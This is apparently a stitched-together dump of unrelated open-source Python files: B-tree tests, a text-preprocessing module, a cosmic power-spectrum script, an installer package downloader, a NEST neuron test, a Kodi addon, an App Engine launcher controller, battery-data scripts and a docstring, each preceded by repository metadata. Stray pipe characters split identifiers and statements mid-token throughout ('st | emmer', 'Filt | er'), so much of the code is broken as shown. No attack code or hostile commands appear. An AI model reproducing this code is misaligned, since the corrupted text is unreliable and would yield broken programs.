self.assertEqual(index.tree_key, item[0])
self.assertEqual(index.tree_value, item[1])
def validate_empty_tree(self, tree):
"""
An empty tree should consist of only two entities, the | tree
itself and the root node. No indices, no other nodes.
"""
first = tree.key
last = | ndb.Key(first.kind(), first.id() + u"\ufffd")
q = ndb.Query(ancestor=first)
q = q.filter(tree.__class__.key < last)
keys = list(q.iter(keys_only=True))
self.assertEqual(keys, [first, tree._make_node_key("root")])
def test_create(self):
tree = BTree.create("tree", 2)
self.assertEqual(tree.tree_size(), 0)
self.assertRaises(ValueError, BTree.create, None, 2)
self.validate_empty_tree(tree)
def test_create_invalid_degree(self):
self.assertRaises(ValueError, BTree.create, "tree", 1)
def test_get_or_create(self):
"""
Tests get_or_create function.
"""
# BTree
tree = BTree.get_or_create("tree", 2)
self.assertTrue(isinstance(tree, BTree))
self.assertEqual(tree.degree, 2)
self.validate_empty_tree(tree)
# MultiBTree
mtree = MultiBTree.get_or_create("mtree", 5)
self.assertTrue(isinstance(mtree, MultiBTree))
self.assertEqual(mtree.degree, 5)
self.validate_empty_tree(mtree)
# MultiBTree2
mtree2 = MultiBTree2.get_or_create("mtree2", 10)
self.assertTrue(isinstance(mtree2, MultiBTree2))
self.assertEqual(mtree2.degree, 10)
self.validate_empty_tree(mtree2)
# Test with a parent entity
parent = ndb.Key('Parent', 'test')
tree_with_parent = BTree.get_or_create('tree-with-parent', 2,
parent=parent)
self.assertEqual(tree_with_parent.key,
ndb.Key('Parent', 'test', 'BTree', 'tree-with-parent'))
# Test get inside a transaction.
def txn():
return BTree.get_or_create("tree", 2)
tree_txn = ndb.transaction(txn)
self.assertEqual(tree, tree_txn)
# Test create inside a transaction
def txn():
return BTree.get_or_create("tree-new", 2, parent=parent)
tree_new = ndb.transaction(txn)
self.assertIsNotNone(tree_new)
# Test invalid degree
self.assertRaises(ValueError, BTree.get_or_create, "tree-invalid", 1)
def test_insert_full_root(self):
t = 5
tree = BTree.create("tree", 5)
for x in reversed(range(2 * t - 1)):
tree.insert(x, str(x))
self.assertEqual(tree.tree_size(), 2 * t - 1)
def test_insert_multiple(self):
"""
Inserts a random sequence of keys, tests ordering.
"""
tree = BTree.create("tree", 2)
seq = [10, 8, 13, 11, 12, 2, 1, 14, 5, 0, 3, 7, 4, 9, 6]
for x in seq:
tree.insert(x, str(x))
self.assertEqual(sorted(seq), walk_keys(tree))
self.assertEqual(tree.tree_size(), len(seq))
def test_insert_duplicate_keys_replaced(self):
tree = BTree.create("tree", 3)
seq = [10, 8, 13, 11, 12, 2, 1, 14, 5, 0, 3, 7, 4, 9, 6]
for x in seq:
tree.insert(x, str(x))
for x in seq:
tree.insert(x, str(2 * x))
self.assertEqual([(x, str(2 * x)) for x in sorted(seq)],
walk_items(tree))
self.assertEqual(tree.tree_size(), len(seq))
def test_insert_delete_single_item(self):
"""Insert and delete a single item."""
tree = BTree.create("tree", 3)
tree.insert(1, "1")
tree.remove(1)
self.assertEqual([], walk_keys(tree))
self.validate_empty_tree(tree)
def test_delete_nonexisting_items(self):
"""Insert and delete a single item."""
tree = BTree.create("tree", 3)
out = tree.remove(234)
self.assertIsNone(out)
def test_insert_two_delete_one(self):
tree = BTree.create("tree", 3)
tree.insert(1, "1")
tree.insert(2, "2")
tree.remove(1)
self.assertEqual([2], walk_keys(tree))
tree = BTree.create("tree", 3)
tree.insert(1, "1")
tree.insert(2, "2")
tree.remove(2)
self.assertEqual([1], walk_keys(tree))
def test_insert_and_delete_all(self):
"""Inserts and removes all items, resulting in an empty tree"""
tree = BTree.create("tree", 3)
seq = list(range(20))
for x in seq:
tree.insert(x, str(x))
for x in seq:
tree.remove(x)
self.assertEqual([], walk_keys(tree))
self.assertEqual(len([]), tree.tree_size())
self.validate_empty_tree(tree)
def test_delete_scenarios(self):
"""Tests various delete scenarios."""
tree = BTree.create("tree", 2)
seq = list(range(25))
for x in seq:
tree.insert(x, str(x))
self.validate_tree(tree)
# Triggers taking a key from left sibling
tree.remove(7)
seq.remove(7)
self.assertEqual(seq, walk_keys(tree))
# Triggers merge right
tree.remove(19)
seq.remove(19)
self.assertEqual(seq, walk_keys(tree))
# Triggers taking a key from right sibling
tree.remove(15)
seq.remove(15)
self.assertEqual(seq, walk_keys(tree))
# Delete all
for x in list(seq):
tree.remove(x)
seq.remove(x)
self.assertEqual(seq, walk_keys(tree))
self.validate_empty_tree(tree)
def test_delete_subtree(self):
"""Tests find predecessor/successor for subtrees"""
tree = BTree.create("tree", 3)
seq = list(range(25))
for x in seq:
tree.insert(x, str(x))
self.assertEqual(seq, walk_keys(tree))
tree.remove(8)
seq.remove(8)
self.assertEqual(seq, walk_keys(tree))
tree.remove(9)
seq.remove(9)
self.assertEqual(seq, walk_keys(tree))
self.assertEqual(len(seq), tree.tree_size())
def test_get_by_index(self):
tree = BTree.create("tree", 2)
items = [(x, str(x)) for x in range(50)]
for x in items:
tree.insert(*x)
for i in range(len(items)):
self.assertEqual(items[i], tree[i])
self.assertRaises(IndexError, tree.__getitem__, len(items) + 1)
self.assertEqual(items, tree[0:tree.tree_size()] |
deka108/meas_deka | apiv2/utils/text_util.py | Python | apache-2.0 | 2,391 | 0.000418 | import re
from nltk.corpus import stopwords
from nltk.corpus import words
from nltk.stem.snowball import SnowballStemmer
from apiv2.models import QuestionText, Question
from apiv2.search.fsearch import formula_extractor as fe
cachedStopWords = stopwords.words("english")
english_vocab = set(w.lower() for w in words.words())
stemmer = SnowballStemmer("english")
# Full text index search
def to_lower(text):
return ' '.join([word.lower() for word in text.split()])
def remove_stopwords(text):
return ' '.join([word for word in text.split() if len(word) > 2 and word
not in cachedStopWords])
def english_only(text):
return ' '.join([word for word in text.split() if word in english_vocab])
def stem_text(text):
return ' '.join([st | emmer.stem(word) for word in text.split()])
def preprocess(text, **kwargs):
preprocessed_text = text
# Recognise and remove LaTeX (detect formula function)
preprocessed_text = clean_latex(preprocessed_text)
# Remove non alphabetical characters
preprocessed_text = remove_non_alphabet(preprocessed_text)
# Convert to lower case
preprocessed_text = to_lower(preprocessed_text)
# Remove stopwords
preprocessed_text = remove_stopwords(preprocessed_text)
# Filt | er words
if kwargs.get("english", True):
preprocessed_text = english_only(preprocessed_text)
if kwargs.get("stem", True):
preprocessed_text = stem_text(preprocessed_text)
return preprocessed_text
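# Illustrative usage sketch (not part of the original module; the exact
# output depends on which NLTK corpora are installed):
#   preprocess("The $$x^2$$ derivative of a function")
#   # LaTeX is stripped, the text lowercased, stopwords and
#   # out-of-vocabulary words dropped, and the survivors stemmed,
#   # yielding something like "deriv function"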
def preprocess_unique(text, **kwargs):
results = preprocess(text, **kwargs).split()
return ' '.join(set(results))
def remove_non_alphabet(text):
text = re.sub(r'[^a-zA-Z]', " ", text)
return text
def clean_latex(text):
text = re.sub(fe.DOUBLE_DOLLAR_NOTATION, " ", text)
text = re.sub(fe.PAREN_NOTATION, " ", text)
text = re.sub(fe.BRACKET_NOTATION, " ", text)
return text
def preprocess_query(text):
text = preprocess(text)
return text
def preprocess_question_text_object(stem=True):
QuestionText.objects.all().delete()
questions = Question.objects.all()
for question in questions:
        preprocessed_text = preprocess(question.content, stem=stem)
print(preprocessed_text)
question_text = QuestionText(
content=preprocessed_text,
question=question
)
question_text.save() |
tbs1980/cosmo-codes | peebles/larura_pcl.py | Python | mpl-2.0 | 5,243 | 0.040244 | from subprocess import call
import matplotlib.pyplot as plt
import numpy as np
import healpy as hp
import sys
import time
map_to_alm='Map2Alm'
alm_to_cl='Alm2Cl'
spice_data='spice_data.fits'
spice_data_alm='spice_data_alm.fits'
spice_noise='spice_noise.fits'
spice_noise_alm='spice_noise_alm.fits'
spice_mask='spice_mask.fits'
spice_dl='spice_dl.dat'
spice_nl='spice_nl.dat'
spice_bl='spice_bl.dat'
spice_crr='spice_crr.dat'
spice_ilm_jlm='spice_ilm_jlm.dat'
def get_mask_file(inv_noise_map):
mask=np.zeros(np.shape(inv_noise_map))
mask[inv_noise_map>0]=1
return mask
def compute_peebles_pcl_estimate(data_file,inv_noise_file,beam_file,num_samps):
#write the data file
d = hp.read_map(data_file)
hp.write_map(spice_data,m=d)
#create a mask file from inv_noise
inv_n = hp.read_map(inv_noise_file)
msk = get_mask_file(inv_n)
hp.write_map(spice_mask,m=msk)
if d.shape != inv_n.shape :
raise RuntimeError("data and noise have different dimensions")
nside=hp.npix2nside(np.shape(d)[0])
#write the noise map
n = np.zeros(np.shape(inv_n))
n[inv_n>0] = 1./np.sqrt(inv_n[inv_n>0])
#write the beam file
| B_l_in = np.loadtxt(beam_file,delimiter=",")
np.savetxt(spice_bl,np.asarray([B_l_in[:,0],B_l_in[:,1]]).T,fmt='%d %0.2f')
B_l = B_l_in[:,1]
    #compute the power spectrum of the data
call([map_to_alm,'-I',spice_data,'-O',spice_data_alm,'-L',str(2*nside),'-m',spice_mask])
call([alm_to_cl,'-I',spice_data_alm,'-O',spice_ | dl,'-P','-m',spice_mask,'-G','-C',spice_ilm_jlm,'-M',spice_data,'-N',str(nside),'-L',str(2*nside+1)])
call(['rm',spice_data_alm])
call(['rm',spice_data])
#read the power spectrum
D_l = np.loadtxt(spice_dl,skiprows=2)[:,1]
#apply beam to the cls
D_l /= B_l**2
    #the Peebles estimator subtracts no Monte Carlo noise term; N_l is zero
N_l = np.zeros(np.shape(D_l))
# subtract
S_l = D_l - N_l
#delete the mask
call(['rm',spice_mask])
call(['rm',spice_dl])
call(['rm',spice_bl])
return (D_l,N_l,S_l)
def compute_pcl_estimate(data_file,inv_noise_file,beam_file,num_samps):
#write the data file
d = hp.read_map(data_file)
hp.write_map(spice_data,m=d)
#create a mask file from inv_noise
inv_n = hp.read_map(inv_noise_file)
msk = get_mask_file(inv_n)
hp.write_map(spice_mask,m=msk)
if d.shape != inv_n.shape :
raise RuntimeError("data and noise have different dimensions")
nside=hp.npix2nside(np.shape(d)[0])
#write the noise map
n = np.zeros(np.shape(inv_n))
n[inv_n>0] = 1./np.sqrt(inv_n[inv_n>0])
#write the beam file
B_l_in = np.loadtxt(beam_file,delimiter=",")
np.savetxt(spice_bl,np.asarray([B_l_in[:,0],B_l_in[:,1]]).T,fmt='%d %0.2f')
B_l = B_l_in[:,1]
    #compute the power spectrum of the data
call([map_to_alm,'-I',spice_data,'-O',spice_data_alm,'-L',str(2*nside),'-m',spice_mask])
call([alm_to_cl,'-I',spice_data_alm,'-O',spice_dl,'-m',spice_mask,'-M',spice_data,'-N',str(nside),'-L',str(2*nside+1)])
call(['rm',spice_data_alm])
call(['rm',spice_data])
#read the power spectrum
D_l = np.loadtxt(spice_dl,skiprows=2)[:,1]
#apply beam to the cls
D_l /= B_l**2
#compute the noise power spectrum using Monte Carlo
N_l = np.zeros(np.shape(D_l))
mu = np.zeros(np.shape(d))
sig= np.ones(np.shape(d))
for samp in range(num_samps):
if samp % 100 == 0 :
print "samples taken =",samp
# draw a realisation from noise
n_i = n*np.random.normal(mu,sig)
#write this to file
hp.write_map(spice_noise,m=n_i)
# find the power spectrum of this realisation
call([map_to_alm,'-I',spice_noise,'-O',spice_noise_alm,'-L',str(2*nside),'-m',spice_mask])
call([alm_to_cl,'-I',spice_noise_alm,'-O',spice_nl,'-m',spice_mask,'-M',spice_noise,'-N',str(nside),'-L',str(2*nside+1)])
#read the power spectrum
N_l_i = np.loadtxt(spice_nl,skiprows=2)[:,1]
# accumulate
N_l += N_l_i
#delete the noise realisation
call(['rm',spice_noise])
call(['rm',spice_noise_alm])
N_l /= float(num_samps)
#apply beam to the nls
N_l /= B_l**2
# subtract
S_l = D_l - N_l
#delete the mask
call(['rm',spice_mask])
call(['rm',spice_nl])
call(['rm',spice_dl])
call(['rm',spice_bl])
return (D_l,N_l,S_l)
def write_pcl(output_file,C_l,N_l,S_l):
ell=np.arange(0,np.shape(S_l)[0])
np.savetxt(output_file,np.asarray([ell,C_l,N_l,S_l]).T,delimiter=",")
if __name__ == "__main__":
if len(sys.argv) == 6 :
start_time = time.time()
data_file = sys.argv[1]
inv_noise_file =sys.argv[2]
beam_file = sys.argv[3]
output_file = sys.argv[4]
num_samps = int(sys.argv[5])
C_l,N_l,S_l = compute_pcl_estimate(data_file,inv_noise_file,beam_file,num_samps)
write_pcl(output_file,C_l,N_l,S_l)
print ""
print (time.time() - start_time) / 60.0, 'minutes'
else:
print "usage: python ",sys.argv[0],"<data> <inv-noise-cov-mat> <beam-file> <output-cl-file> <n-samps>"
print "example: python",sys.argv[0], "./data.fits ./invNoise.fits ./window_func_temp_ns128.bl ./base.pcl 100"
|
yucefsourani/Cnchi | cnchi/download/download_requests.py | Python | gpl-3.0 | 7,157 | 0.001956 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# download_requests.py
#
# Copyright © 2013-2015 Antergos
#
# This file is part of Cnchi.
#
# Cnchi is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Cnchi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cnchi; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
""" Module to download packages using requests library """
import os
import logging
import queue
import shutil
import requests
import time
class Download(object):
""" Class to download packages using urllib
This class tries to previously download all necessary packages for
Antergos installation using urllib """
def __init__(self, pacman_cache_dir, cache_dir, callback_queue):
""" Initialize Download class. Gets default configuration """
self.pacman_cache_dir = pacman_cache_dir
self.cache_dir = cache_dir
self.callback_queue = callback_queue
# Stores last issued event (to prevent repeating events)
self.last_event = {}
def start(self, downloads):
""" Downloads using requests """
downloaded = 0
total_downloads = len(downloads)
all_successful = True
self.queue_event('downloads_progress_bar', 'show')
self.queue_event('downloads_percent', '0')
while len(downloads) > 0:
identity, element = downloads.popitem()
self.queue_event('percent', '0')
txt = _("Downloading {0} {1} ({2}/{3})...")
txt = txt.format(element['identity'], element['version'], downloaded + 1, total_downloads)
self.queue_event('info', txt)
try:
total_length = int(element['size'])
except TypeError:
# We will get the total length from the requests GET
pass
# logging.warning(_("Metalink for package %s has no size info"), element['identity'])
# total_length = 0
# If the user doesn't give us a cache dir to copy xz files from, self.cache_dir will be None
if self.cache_dir:
dst_cache_path = os.path.join(self.cache_dir, element['filename'])
else:
dst_cache_path = ""
dst_path = os.path.join(self.pacman_cache_dir, element['filename'])
needs_to_download = True
if os.path.exists(dst_path):
# File already exists (previous install?) do not download
logging.warning(_("File %s already exists, Cnchi will not overwrite it"), element['filename'])
needs_to_download = False
downloaded += 1
elif self.cache_dir and os.path.exists(dst_cache_path):
# We're lucky, the package is already downloaded in the cache the user has given us
# let's copy it to our destination
logging.debug(_('%s found in iso pkg cache. Copying...'), element['filename'])
try:
shutil.copy(dst_cache_path, dst_path)
needs_to_download = False
downloaded += 1
except OSError as os_error:
logging.warning(_("Error copying %s to %s. Cnchi will try to download it"), dst_cache_path, dst_path)
logging.error(os_error)
needs_to_download = True
if needs_to_download:
# Let's download our filename using url
for url in element['urls']:
# msg = _("Downloading file from url {0}").format(url)
# logging.debug(msg)
percent = 0
completed_length = 0
start = time.clock()
r = requests.get(url, stream=True)
total_length = int(r.headers.get('content-length'))
if r.status_code == requests.codes.ok:
with open(dst_path, 'wb') as xz_file:
for data in r.iter_content(1024):
if not data:
break
xz_file.write(data)
completed_length += len(data)
old_percent = percent
if total_length > 0:
percent = round(float(completed_length / total_length), 2)
else:
percent += 0.1
if old_percent != percent:
self.queue_event('percent', percent)
progress_text = "{0} {1} bps".format(percent, completed_length // (time.clock() - start))
self.queue_event('progress_bar_text', progress_text)
download_error = False
downloaded += 1
| break
else:
download_error = True
msg = _("Can't download {0}, Cnchi will try another mirror.").format(url)
# completed_length = 0
logging.warning(msg)
if download_error:
# None of the mirror urls works.
# This is not a total disaster, maybe alpm will be able
# to download it for us later in pac.py
| msg = _("Can't download {0}, even after trying all available mirrors")
msg = msg.format(element['filename'])
all_successful = False
logging.error(msg)
downloads_percent = round(float(downloaded / total_downloads), 2)
self.queue_event('downloads_percent', str(downloads_percent))
self.queue_event('downloads_progress_bar', 'hide')
return all_successful
def queue_event(self, event_type, event_text=""):
""" Adds an event to Cnchi event queue """
if self.callback_queue is None:
if event_type != "percent":
logging.debug("{0}: {1}".format(event_type, event_text))
return
if event_type in self.last_event:
if self.last_event[event_type] == event_text:
# do not repeat same event
return
self.last_event[event_type] = event_text
try:
# Add the event
self.callback_queue.put_nowait((event_type, event_text))
except queue.Full:
pass
|
dimddev/NetCatKS | NetCatKS/Components/api/interfaces/factories/__init__.py | Python | bsd-2-clause | 65 | 0 | """
A good p | lace for factory interfaces
"""
__author_ | _ = 'dimd'
|
hesam-setareh/nest-simulator | pynest/nest/tests/test_siegert_neuron.py | Python | gpl-2.0 | 4,811 | 0 | # -*- coding: utf-8 -*-
#
# test_siegert_neuron.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
# This script tests the siegert_neuron in NEST.
import nest
import unittest
import numpy as np
HAVE_GSL = nest.sli_func("statusdict/have_gsl ::")
@nest.check_stack
@unittest.skipIf(not HAVE_GSL, 'GSL is not available')
class SiegertNeuronTestCase(unittest.TestCase):
"""
Test siegert_neuron
Details
-------
Compares the rate of a Poisson-driven iaf_psc_delta neuron
with the prediction from the siegert neuron.
"""
def setUp(self):
# test parameter to compare analytic solution to simulation
self.rtol = 1.0
# test parameters
self.N = 100
self.rate_ex = 1.5 * 1e4
self.J = 0.1
# simulation parameters
self.simtime = 500.
self.dt = 0.1
self.start = 200.
nest.set_verbosity('M_WARNING')
nest.ResetKernel()
nest.SetKernelStatus(
{'resolution': self.dt, 'use_wfr': False, 'print_time': True})
# set up driven integrate-and-fire neuron
self.iaf_psc_delta = nest.Create(
'iaf_psc_delta', self.N) # , params={"C_m": 1.0})
self.poisson_generator = nest.Create(
'poisson_generator', params={'rate': self.rate_ex})
nest.Connect(self.poisson_generator, self.iaf_psc_delta,
syn_spec={'weight': self.J, 'delay': self.dt})
self.spike_detector = nest.Create(
"spike_detector", params={'start': self.start})
nest.Connect(
self.iaf_psc_delta, self.spike_detector)
# set up driven siegert neuron
neuron_status = nest.GetStatus(self.iaf_psc_delta)[0]
siegert_params = {'tau_m': neuron_status['tau_m'],
't_ref': neuron_status['t_ref'],
'theta': neuron_status['V_th'] -
neuron_status['E_L'],
'V_reset': neuron_status['V_reset'] -
neuron_status['E_L']}
self.siegert_neuron = nest.Create(
'siegert_neuron', params=siegert_params)
self.siegert_drive = nest.Create(
'siegert_neuron', 1, params={'mean': self.rate_ex})
J_mu_ex = neuron_status['tau_m'] * 1e-3 * self.J
J_sigma_ex = neuron_status['tau_m'] * 1e-3 * self.J**2
syn_dict = {'drift_factor': J_mu_ex, 'diffusion_factor':
J_sigma_ex, 'model': ' | diffusion_connection'}
nest.Connect(
self.siegert_drive, self.siegert_neuron, syn_spec=syn_dict)
self.multimeter = nest.Create(
"multimeter", params={'record_from': ['rate'],
| 'interval': self.dt})
nest.Connect(
self.multimeter, self.siegert_neuron)
def test_RatePrediction(self):
"""Check the rate prediction of the siegert neuron"""
# simulate
nest.Simulate(self.simtime)
# get rate prediction from siegert neuron
events = nest.GetStatus(self.multimeter)[0]["events"]
senders = events['senders']
rate = events['rate'][np.where(senders == self.siegert_neuron)]
rate_prediction = rate[-1]
# get simulated rate of integrate-and-fire neuron
rate_iaf = nest.GetStatus(self.spike_detector)[0][
"n_events"] / ((self.simtime - self.start) * 1e-3) / self.N
# test rate prediction against simulated rate of
# integrate-and-fire neuron
self.assertTrue(np.isclose(rate_iaf, rate_prediction, rtol=self.rtol))
# test rate prediction against hard coded result
rate_prediction_test = 27.1095934379
self.assertTrue(np.isclose(rate_prediction_test, rate_prediction))
def suite():
# makeSuite is sort of obsolete http://bugs.python.org/issue2721
# using loadTestsFromTestCase instead.
suite1 = unittest.TestLoader().loadTestsFromTestCase(
SiegertNeuronTestCase)
return unittest.TestSuite([suite1])
def run():
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite())
if __name__ == "__main__":
run()
|
rafa400/telepi | script.telepi-master/addon.py | Python | gpl-2.0 | 669 | 0.031484 | import xbmcaddon
import xbmcgui
import subprocess,os
def EstoEsUnaFun( str ):
xbmcgui.Dialog().ok("ESO ES" | ,"AHHHH",str)
return
addon = xbmcaddon.Addon()
addonname = addon.getAddonInfo('name')
line1 = "Hello World!"
line2 = "We can write anything we want here"
line3 = "Using Python"
my_s | etting = addon.getSetting('my_setting') # returns the string 'true' or 'false'
addon.setSetting('my_setting', 'false')
os.system("echo caca>>/home/rafa400/caca.txt")
dia=xbmcgui.Dialog();
dia.addControl(xbmcgui.ControlLabel(x=190, y=25, width=500, height=25, label="Hoooolaa"))
dia.ok(addonname, line1, line2, line3 + my_setting)
#xbmcgui.Window().show()
|
pcamp/google-appengine-wx-launcher | launcher/taskcontroller.py | Python | apache-2.0 | 12,617 | 0.005627 | #!/usr/bin/env python
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import subprocess
import webbrowser
import wx
import launcher
# TODO: rename this file task_controller.py in a big renameathon
class TaskController(object):
"""Main conroller (MVC) for running tasks.
Tasks are running instances of App Engine projects.
"""
def __init__(self, app_controller):
"""Create a new TaskController.
Args:
app_controller: the main application controller.
"""
self._app_controller = app_controller
# self._frame: the main frame for project display
# self._threads: an array of threads for running App Engine applicatons
# self._consoles: an array of LogConsoles for App Engine applications
self._frame = None
self._threads = []
self._consoles = []
self._runtime = None
self._platform = launcher.Platform()
self._preferences = None
def SetModelsViews(self, frame=None, runtime=None, platform=None,
preferences=None):
"""Set models and views (MVC) for this controller.
We need a pointer to the main frame. We can't do in __init__
since those objects wants a pointer to me as well, and one must
come first. Convention for launcher is for model/view to take
controllers in their __init__, and have the controller accept it
later with a call to SetModelsViews().
Args:
frame: the main frame (MainFrame) for the app
runtime: a launcher.Runtime
platform: a launcher.Platform
preferences: a launcher.Preferences
"""
if frame:
self._frame = frame
if runtime:
self._runtime = runtime
if platform:
self._platform = platform
if preferences:
self._preferences = preferences
def _GenericRun(self, extra_flags=None):
"""Run the project(s) selected in the main frame.
Args:
extra_flags: a list of extra command line flags for the run command
"""
for project in self._frame.SelectedProjects():
cmd = None
err = ""
try:
if self._FindThreadForProject(project):
logging.warning('Already running a task for %s!' % project.path)
else:
cmd = self._runtime.DevAppServerCommand(project,
extra_flags=extra_flags)
except launcher.RuntimeException, r:
err = r.message
if not cmd or err:
logging.error(err + '\n'
'Cannot run project %s. Please confirm '
'these values in your Preferences, or take an '
'appropriate measure to fix it (e.g. install Python).'
% project.path)
else:
t = self._CreateTaskThreadForProject(project, cmd)
t.start()
self._threads.append(t)
def _OpenFile(self, path, run_open_cmd):
"""Open file in browser.
Will launch external browser in platform dependent manner.
Args:
path: Absolute path to open.
"""
opencmd = self._platform.OpenCommand(path)
if not opencmd:
logging.warning('Could not form an open command, sorry')
return
run_open_cmd(opencmd)
def OpenSDK(self, event, run_open_cmd=subprocess.Popen):
"""Open SDK in browser.
Called from UI menu.
"""
sdk_dir = self._platform.AppEngineBaseDirectory()
self._OpenFile(sdk_dir, run_open_cmd)
def Run(self, event):
"""Run the project(s) selected in the main frame.
Called directly from UI.
"""
self._GenericRun()
def RunStrict(self, event):
"""Run the project(s) selected in the main frame, strictly.
Called directly from UI.
"""
self._GenericRun(['--require_indexes'])
def _CreateTaskThreadForProject(self, project, cmd):
"""Create and return a task thread, for executing cmd on project.
Assumes the task thread is for running dev_appserver.
Split into a seperate method to make unit testing of self.Run() easier.
Args:
project: the Project that needs a thread
cmd: list of exec and args; the command to execute,
associated with the project
"""
return launcher.DevAppServerTaskThread(self, project, cmd)
def Stop(self, event):
"""Stop the project(s) selected in the main frame.
Called directly from UI.
"""
for project in self._frame.SelectedProjects():
thread = self._FindThreadForProject(project)
if not thread:
if project.runstate == launcher.Project.STATE_DIED:
# Just clearing out a stop.
project.runstate = launcher.Project.STATE_STOP
self.RunStateChanged(project)
else:
logging.warning('Cannot find a running task for %s!' % project.path)
else:
thread.stop() # async
pass
def Browse(self, event):
"""Browse the project(s) selected in the main frame if they are running.
Called directly from UI.
"""
project_list = [p for p in self._frame.SelectedProjects()
if p.runstate == launcher.Project.STATE_RUN]
if not project_list:
logging.warning('No selected projects are running ' +
'so we have nothing to Browse.')
return
for project in project_list:
self._BrowseProject(project)
def _FindOrCreateConsole(self, project):
"""Find and return the launcher.LogConsole for project; create if needed.
Args:
project: the Project associated (or to be associated with) the LogConsole
"""
for console in self._consoles:
if project == console.project:
return console
console = launcher.LogConsole(project)
self._consoles.append(console)
return console
def StopAll(self, _=None):
"""Stop all projects.
Args:
_: not used (made consisten | t with Stop/Run for easier testing)
"""
[t.stop() for t in self._threads] # t.stop() is async.
def _FindThreadForProject(self, project):
"""Find and return the launcher.TaskThread for project, or None.
Args:
pr | oject: the project whose thread we are looking for
"""
for thread in self._threads:
if thread.project == project:
return thread
return None
def Logs(self, event):
"""Display the Console window for the project(s) selected in the main frame.
Called directly from UI.
"""
for project in self._frame.SelectedProjects():
console = self._FindOrCreateConsole(project)
console.DisplayAndBringToFront()
def SdkConsole(self, event):
"""Opens the local SDK Administration console.
The Console is opened for the project(s) selected in the main frame.
The URL looks something like http://localhost:PORT/_ah/admin.
Called directly from UI.
"""
project_list = [p for p in self._frame.SelectedProjects()
if p.runstate == launcher.Project.STATE_RUN]
if not project_list:
logging.warning('No selected projects are running ' +
'so we have no Admin Console to go to.')
return
for project in project_list:
self._BrowseAdminConsoleForProject(project)
def Edit(self, event, run_edit_cmd=subprocess.Popen):
"""Opens, for edit, the project(s) selected in the main frame.
Called directly from UI.
Args:
event: a wxPython event (for all Bind()ings)
run_edit_cmd: the command used to run the actual tuple edit command.
Only ever set to the non-default in a unit test.
"""
for project in self._frame.SelectedProjects():
editor = self._preferences[launcher.Preferences.PREF_EDITOR]
editcmd = self._platform.EditCommand(editor, project.path)
|
jepegit/cellpy | dev_utils/helpers/performance.py | Python | mit | 2,592 | 0.002315 | import os
import sys
import time
print(f"running {sys.argv[0]}")
import cellpy
from cellpy import cellreader, log
from cellpy.parameters import prms
# -------- defining overall path-names etc ----------
current_file_path = os.path.dirname(os.path.realpath(__file__))
relative_test_data_dir = "../testdata"
test_data_dir = os.path.abspath(os.path.join(current_file_path, relative_test_data_dir))
test_data_dir_raw = os.path.join(test_data_dir, "data")
test_res_file = "20160805_test001_45_cc_01.res"
test_res_file_full = os.path.join(test_data_dir_raw, test_res_file)
test_data_dir_out = os.path.join(test_data_dir, "out")
test_data_dir_cellpy = os.path.join(test_data_dir, "hdf5")
test_cellpy_file = "20160805_test001_45_cc.h5"
test_cellpy_file_tmp = "tmpfile.h5"
test_cellpy_file_full = os.path.join(test_data_dir_cellpy, test_cellpy_file)
test_cellpy_file_tmp_full = os.path.join(test_data_dir_cellpy, test_cellpy_file_tmp)
test_run_name = "20160805_test001_45_cc"
log.setup_logging(default_level="DEBUG")
new_arbin_file = (
r"C:\Scripting\Processing\Celldata\indata\NewArbin\20170907_sic024_01_cc_01.res"
)
new_arbin_mass = 0.824098422
def load_it(cellpy_data_instance):
# cellpy_data_instance.loadcell(test_res_file_full)
raw_file_loader = cellpy_data_instance.loader
test = raw_file_loader(test_res_file_full)
cellpy_data_instance.datasets.append(test[0])
def append_to_it(cellpy_data_instance):
raw_file_loader = cellpy_data_instance.loader
test = raw_file_loader(test_res_file_full)
cellpy_data_instance.datasets.append(test[0])
def info(cellpy_data_instance):
print(f"\nINFO ON {cellpy_data_instance}")
for dataset in cellpy_data_instance.datasets:
print(dataset)
def report_time(t1, t2):
txt = f"used: {t2-t1} seconds"
print(txt)
def time_routine():
d = cellreader.CellpyData()
# size pr chunk used by pandas when loading:
prms.Instruments.Arbin.chunk_size = 10000
# stops loading when reaching this:
prms.Instruments.Arbin.max_chunks = 1
t1 = time.time()
load_it(d)
# set new current chunk
# append_to_it(d)
t2 = time.time()
# d.make_step_table()
# d.make_summary()
# info(d)
print("-- | ----------------finished------------------")
report_time(t1, t2)
def missing_stats_file():
d = cellreader.CellpyData()
raw_file_loader = d.l | oader
test = raw_file_loader(new_arbin_file)
d.cells.append(test[0])
d.set_mass(new_arbin_mass)
d.make_summary(use_cellpy_stat_file=False)
if __name__ == "__main__":
missing_stats_file()
|
aarongarrett/inspyred | inspyred/swarm/topologies.py | Python | mit | 4,282 | 0.008174 | """
=====================================
:mod:`topologies` -- Swarm topologies
=====================================
This module defines various topologies for swarm intelligence algorithms.
Particle swarms make use of topologies, which determine the logical
relationships among particles in the swarm (i.e., which ones belong to the same
"neighborhood"). All topology functions have the following arguments:
- *random* -- the random number generator object
- *population* -- the population of Particles
- *args* -- a dictionary of keyword arguments
Each topology function returns a list of lists of neighbors
for each particle in the population. For example, if a swarm
